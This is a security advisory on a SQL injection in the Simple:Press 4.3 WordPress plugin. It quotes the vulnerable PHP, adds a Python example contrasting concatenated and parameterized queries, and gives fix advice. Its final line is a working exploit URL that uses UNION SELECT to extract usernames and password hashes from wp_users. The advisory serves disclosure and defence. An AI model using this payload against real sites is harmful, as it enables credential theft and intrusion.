WordPress Simple:Press 4.3 plugin "value" parameter SQL injection vulnerability

2010-07-07T00:00:00
ID SSV:19912
Type seebug
Reporter Root
Modified 2010-07-07T00:00:00

Description

BUGTRAQ ID: 41348

WordPress is a free forum/blog system.

The Simple:Press plugin used with WordPress does not properly filter the search variable that the user enters in the search field before it is injected into an SQL query:

sf-header-forum.php
---[snip]---
    385 # Add Search Vars
    386 if(isset($_GET['search']))
    387 {
    388     if($_GET['search'] != '') $sfvars['searchpage'] = sf_esc_int($_GET['search']);
    389     if(isset($_GET['value']) ? $sfvars['searchvalue'] = stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] = '');
    390     if(isset($_GET['type']) ? $sfvars['searchtype'] = sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);
    400     if(isset($_GET['include']) ? $sfvars['searchinclude'] = sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);
    401     if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;
    402     if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;
    403 } else {
---[snip]---

At line 389, the HTTP GET parameter "value" is stored in the global variable $sfvars['searchvalue'] after passing through stripslashes() and urldecode(). Neither function secures it: unlike the "search", "type" and "include" parameters, which go through sf_esc_int(), "value" is not escaped or cast, and in sf-database.php $sfvars['searchvalue'] is concatenated into the SQL query without any quotes (single or double), so the raw value becomes part of the statement.

sf-database.php
---[snip]---
    ...
    401 $searchvalue=urldecode($sfvars['searchvalue']);
    ...
    404 if($sfvars['searchtype'] == 6)
    ...
    409     $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";
    410
    411 } elseif($sfvars['searchtype'] == 8)
    ...
    414     $userid = $sfvars['searchvalue'];
    415     $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
    416     $MATCH = "";
    417     $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";
    418
    419 } elseif($sfvars['searchtype'] == 9)
    ...
    422     $userid = $sfvars['searchvalue'];
    ...
    425     $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";
    ...
---[snip]---
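The snippets above build the WHERE clause by string concatenation, and for search types 6, 8 and 9 the value is meant to be an integer (a status flag or a user id). The following is an added example, not code from the advisory or from the Simple:Press plugin: it renders the same pattern in Python against an in-memory SQLite table so the difference is executable. The vulnerable builder reproduces the concatenation seen in sf-database.php; the hardened builder validates the value as an integer and passes it as a bound parameter. The table name, column names and sample rows are constructed for the example and are not the plugin's real schema.

```python
import sqlite3

# Constructed sample rows (not from the advisory):
# (topic_id, topic_name, user_id, topic_status_flag)
SAMPLE_TOPICS = [
    (1, "Welcome", 5, 0),
    (2, "Rules", 5, 1),
    (3, "Hello", 7, 0),
]


def vulnerable_where(searchtype, searchvalue):
    """Mirrors the advisory's sf-database.php pattern: the raw search value is
    concatenated into the WHERE clause with no quotes and no integer escaping,
    so whatever text the client sent becomes part of the SQL statement."""
    if searchtype == 6:
        return " AND topic_status_flag=" + searchvalue + " "
    if searchtype in (8, 9):
        return " AND user_id=" + searchvalue + " "
    return ""


def safe_where(searchtype, searchvalue):
    """Hardened equivalent: for the integer-only search types the value is
    validated as an integer and returned separately from the SQL text, to be
    bound as a parameter. Non-numeric input is rejected instead of embedded."""
    if searchtype not in (6, 8, 9):
        return "", ()
    try:
        value = int(searchvalue)
    except (TypeError, ValueError):
        raise ValueError("search value must be an integer for this search type")
    column = "topic_status_flag" if searchtype == 6 else "user_id"
    return " AND " + column + "=? ", (value,)


def run_search(searchtype, searchvalue):
    """Executes the hardened query against the constructed table and returns
    the matching topic ids, so the parameterized form can be checked end to end."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE topics(topic_id INTEGER, topic_name TEXT, "
        "user_id INTEGER, topic_status_flag INTEGER)"
    )
    conn.executemany("INSERT INTO topics VALUES (?,?,?,?)", SAMPLE_TOPICS)
    where, params = safe_where(searchtype, searchvalue)
    rows = conn.execute("SELECT topic_id FROM topics WHERE 1=1" + where, params).fetchall()
    conn.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    # A non-numeric value is embedded verbatim by the vulnerable builder ...
    print(repr(vulnerable_where(9, "5 OR 1=1")))
    # ... and rejected by the hardened one.
    try:
        safe_where(9, "5 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
    print(run_search(9, "5"))
```

The same fix in the plugin's own terms is to treat "value" like the neighbouring parameters: cast or escape it as an integer (the page's sf_esc_int() is used for exactly that on "search", "type" and "include") before it reaches sf-database.php, or better, bind it as a query parameter rather than concatenating it.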

WordPress Simple:Press 4.3 vendor patch:

WordPress

The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://simple-press.com/

http://ssvdb.com/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2